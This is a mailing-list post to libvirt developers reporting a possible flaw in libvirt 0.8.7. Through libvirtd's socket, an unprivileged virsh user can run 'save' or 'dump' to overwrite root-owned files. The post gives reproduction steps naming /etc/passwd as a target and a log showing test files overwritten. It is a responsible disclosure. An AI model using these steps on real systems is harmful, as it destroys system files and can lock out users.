Possible security hole? unprivileged user can use virsh to overwrite sensitive system file

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

I found there's a way for a unprivileged user to overwrite sensitive system file with virsh, here's how: 1. (as an unprivileged user) start virsh and connect to the r/w socket of libvirtd: 
   virsh -c qemu+unix:///system?socket=/var/run/libvirt/libvirt-sock
2. start a guest, then issue 'save' or 'dump' command, giving a sensitive system file path as the <file> parameter, for example, '/etc/passwd'; 
3. the sensitive system file will be overwritten;
Attached is a test log. I'm using libvirt-0.8.7 on a OpenClient for RHEL 6.1. And latest libvirt code shows the same symptom.
BTW, virsh expands the <file> parameter in step to an absolute path if user-provided is not, and libvirtd interprets it as a local file. IMHO it does not look quite right, especially when the virsh-to-libvirtd connection is remote. 

--
Thanks.
Hong Xiang

[hxiang@T420 ~]$ cat /etc/redhat-release 
Red Hat Enterprise Linux Workstation release 6.1 (Santiago)
[hxiang@T420 ~]$ cat /etc/openclient-release 
Open Client RHEL 64 3.10 (Gold Master)
[hxiang@T420 ~]$ libvirtd --version
libvirtd (libvirt) 0.8.7
[hxiang@T420 ~]$ virsh -V
Virsh command line tool of libvirt 0.8.7
See web site at http://libvirt.org/

Compiled with support for:
 Hypervisors: QEmu/KVM LXC ESX Test
 Networking: Remote Daemon Network Bridging Netcf Nwfilter VirtualPort
 Storage: Dir Disk Filesystem SCSI Multipath iSCSI LVM
 Miscellaneous: SELinux Secrets Debug DTrace Readline
[hxiang@T420 ~]$ ls -l /etc/precious.*
-rw-r--r--. 1 root root 2 Oct 12 11:38 /etc/precious.1
-rw-r--r--. 1 root root 2 Oct 12 11:38 /etc/precious.2
[hxiang@T420 ~]$ virsh -c qemu+unix:///system?socket=/var/run/libvirt/libvirt-sock
Welcome to virsh, the virtualization interactive terminal.

Type:  'help' for help with commands
       'quit' to quit

virsh # start fc15
Domain fc15 started

virsh # dump fc15 /etc/precious.1
Domain fc15 dumped to /etc/precious.1

virsh # save fc15 /etc/precious.2
Domain fc15 saved to /etc/precious.2

virsh # 
[hxiang@T420 ~]$ ls -l /etc/precious.*
-rw-r--r--. 1 root root 253777159 Oct 12 11:42 /etc/precious.1
-rw-r--r--. 1 root root 257745683 Oct 12 11:42 /etc/precious.2
[hxiang@T420 ~]$ 


--
libvir-list mailing list
libvir-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/libvir-list
[Index of Archives]     [Virt Tools]     [Libvirt Users]     [Lib OS Info]     [Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Big List of Linux Books]     [Yosemite News]     [KDE Users]     [Fedora Tools]